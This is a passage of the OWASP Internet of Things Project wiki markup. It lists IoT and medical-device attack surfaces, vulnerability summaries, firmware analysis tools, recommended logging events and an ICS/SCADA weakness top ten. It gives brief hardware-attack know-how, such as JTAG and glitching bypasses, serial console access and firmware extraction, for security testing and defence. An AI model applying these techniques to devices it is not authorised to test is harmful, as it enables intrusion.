** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246181OWASP Internet of Things Project2018-12-19T23:37:32Z<p>Aaron.guzman: /* Main */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
